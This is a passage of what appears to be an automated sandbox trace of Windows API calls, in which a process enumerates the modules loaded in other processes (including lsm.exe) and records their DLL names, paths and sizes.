GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0053.114] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x2578820, cb=0x18 | out: lpmodinfo=0x2578820*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0053.114] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0053.115] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0053.115] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x257a9e0, cb=0x18 | out: lpmodinfo=0x257a9e0*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0053.116] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0053.117] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0053.117] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x257cba0, cb=0x18 | out: lpmodinfo=0x257cba0*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0053.118] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0053.119] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0053.119] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff760000, lpmodinfo=0x257ed60, cb=0x18 | out: lpmodinfo=0x257ed60*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0053.120] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff760000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0053.120] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff760000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0053.121] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x2580fd0, cb=0x18 | out: lpmodinfo=0x2580fd0*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0053.122] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0053.122] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0053.123] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x2583190, cb=0x18 | out: lpmodinfo=0x2583190*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0053.124] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0053.125] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0053.125] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x2585350, cb=0x18 | out: lpmodinfo=0x2585350*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0053.126] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0053.127] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0053.128] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x2587500, cb=0x18 | out: lpmodinfo=0x2587500*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0053.128] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0053.129] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0053.130] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x25896c0, cb=0x18 | out: lpmodinfo=0x25896c0*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0053.131] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0053.132] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0053.133] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x258b880, cb=0x18 | out: lpmodinfo=0x258b880*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0053.134] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0053.135] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0053.136] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x258da40, cb=0x18 | out: lpmodinfo=0x258da40*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0053.137] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0053.138] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0053.139] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x258fc10, cb=0x18 | out: lpmodinfo=0x258fc10*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0053.140] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0053.141] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0053.142] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd070000, lpmodinfo=0x2591ef8, cb=0x18 | out: lpmodinfo=0x2591ef8*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0053.143] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd070000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0053.145] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd070000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0053.146] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcd70000, lpmodinfo=0x25940b8, cb=0x18 | out: lpmodinfo=0x25940b8*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0053.147] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcd70000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0053.148] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcd70000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0053.149] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef31e0000, lpmodinfo=0x2596278, cb=0x18 | out: lpmodinfo=0x2596278*(lpBaseOfDll=0x7fef31e0000, SizeOfImage=0x6b000, EntryPoint=0x7fef3228b54)) returned 1 [0053.150] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef31e0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="sppwinob.dll") returned 0xc [0053.151] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef31e0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sppwinob.dll" (normalized: "c:\\windows\\system32\\sppwinob.dll")) returned 0x20 [0053.153] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef4d70000, lpmodinfo=0x2598448, cb=0x18 | out: lpmodinfo=0x2598448*(lpBaseOfDll=0x7fef4d70000, SizeOfImage=0x10d000, EntryPoint=0x7fef4dca848)) returned 1 [0053.154] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef4d70000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="sppobjs.dll") returned 0xb [0053.155] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef4d70000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sppobjs.dll" (normalized: "c:\\windows\\system32\\sppobjs.dll")) returned 0x1f [0053.157] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefce90000, lpmodinfo=0x259a608, cb=0x18 | out: lpmodinfo=0x259a608*(lpBaseOfDll=0x7fefce90000, SizeOfImage=0x5b000, EntryPoint=0x7fefce96940)) returned 1 [0053.158] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefce90000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0053.159] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefce90000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DNSAPI.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0053.161] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff970000, lpmodinfo=0x259c7c8, cb=0x18 | out: lpmodinfo=0x259c7c8*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0053.162] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff970000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0053.164] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff970000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0053.165] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9c0000, lpmodinfo=0x259e988, cb=0x18 | out: lpmodinfo=0x259e988*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0053.166] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9c0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0053.169] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9c0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0053.170] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdf90000, lpmodinfo=0x25a0b38, cb=0x18 | out: lpmodinfo=0x25a0b38*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0053.171] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdf90000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0053.173] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdf90000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0053.174] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff360000, lpmodinfo=0x25a2d08, cb=0x18 | out: lpmodinfo=0x25a2d08*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0053.176] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff360000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0053.177] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff360000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0053.179] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd640000, lpmodinfo=0x25a4ee0, cb=0x18 | out: lpmodinfo=0x25a4ee0*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0053.180] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd640000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0053.182] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd640000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0053.184] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdc80000, lpmodinfo=0x25a70a0, cb=0x18 | out: lpmodinfo=0x25a70a0*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0053.186] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdc80000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0053.187] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdc80000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0053.189] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9a0000, lpmodinfo=0x25a9270, cb=0x18 | out: lpmodinfo=0x25a9270*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0053.191] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0053.192] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0053.194] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd980000, lpmodinfo=0x25ab440, cb=0x18 | out: lpmodinfo=0x25ab440*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0053.195] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd980000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0053.197] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd980000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0053.199] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd830000, lpmodinfo=0x25ad600, cb=0x18 | out: lpmodinfo=0x25ad600*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0053.201] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd830000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0053.202] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd830000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0053.204] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9e0000, lpmodinfo=0x25af7d0, cb=0x18 | out: lpmodinfo=0x25af7d0*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0053.206] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0053.207] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0053.209] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd820000, lpmodinfo=0x25b1990, cb=0x18 | out: lpmodinfo=0x25b1990*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0053.211] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd820000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0053.213] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd820000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0053.215] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x218 [0053.215] EnumProcessModules (in: hProcess=0x218, lphModule=0x25b4c08, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25b4c08, lpcbNeeded=0x41eb20) returned 1 [0053.216] GetModuleInformation (in: hProcess=0x218, hModule=0xff690000, lpmodinfo=0x25b4e78, cb=0x18 | out: lpmodinfo=0x25b4e78*(lpBaseOfDll=0xff690000, SizeOfImage=0x57000, EntryPoint=0xff6a3450)) returned 1 [0053.216] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xff690000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="lsm.exe") returned 0x7 [0053.217] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xff690000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe")) returned 0x1b [0053.217] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x25b7060, cb=0x18 | out: lpmodinfo=0x25b7060*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0053.217] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0053.218] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0053.218] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x25b9220, cb=0x18 | out: lpmodinfo=0x25b9220*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0053.218] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0053.219] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0053.219] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x25bb3f0, cb=0x18 | out: lpmodinfo=0x25bb3f0*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0053.219] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0053.220] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0053.220] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x25bd5c0, cb=0x18 | out: lpmodinfo=0x25bd5c0*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0053.221] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0053.221] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0053.221] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x25bf7d8, cb=0x18 | out: lpmodinfo=0x25bf7d8*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0053.222] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0053.222] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0053.223] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x25c1998, cb=0x18 | out: lpmodinfo=0x25c1998*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0053.223] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0053.224] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0053.225] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd1d0000, lpmodinfo=0x25c3b58, cb=0x18 | out: lpmodinfo=0x25c3b58*(lpBaseOfDll=0x7fefd1d0000, SizeOfImage=0xa000, EntryPoint=0x7fefd1d3b40)) returned 1 [0053.225] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd1d0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="SYSNTFY.dll") returned 0xb [0053.226] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd1d0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SYSNTFY.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")) returned 0x1f [0053.227] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd1c0000, lpmodinfo=0x25c5d18, cb=0x18 | out: lpmodinfo=0x25c5d18*(lpBaseOfDll=0x7fefd1c0000, SizeOfImage=0x8000, EntryPoint=0x7fefd1c2a6c)) returned 1 [0053.228] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd1c0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="WMsgAPI.dll") returned 0xb [0053.228] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd1c0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WMsgAPI.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll")) returned 0x1f [0053.229] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x25c7f70, cb=0x18 | out: lpmodinfo=0x25c7f70*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0053.230] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0053.231] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0053.232] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc80000, lpmodinfo=0x25ca140, cb=0x18 | out: lpmodinfo=0x25ca140*(lpBaseOfDll=0x7fefcc80000, SizeOfImage=0xd000, EntryPoint=0x7fefcc81348)) returned 1 [0053.233] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc80000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="pcwum.dll") returned 0x9 [0053.233] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc80000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")) returned 0x1d [0053.234] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x25cc300, cb=0x18 | out: lpmodinfo=0x25cc300*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0053.235] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0053.236] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0053.236] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd610000, lpmodinfo=0x25ce4d0, cb=0x18 | out: lpmodinfo=0x25ce4d0*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0053.237] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd610000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0053.238] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd610000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0053.239] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd640000, lpmodinfo=0x25d0690, cb=0x18 | out: lpmodinfo=0x25d0690*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0053.240] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd640000, lpBaseName=0x786bf0, 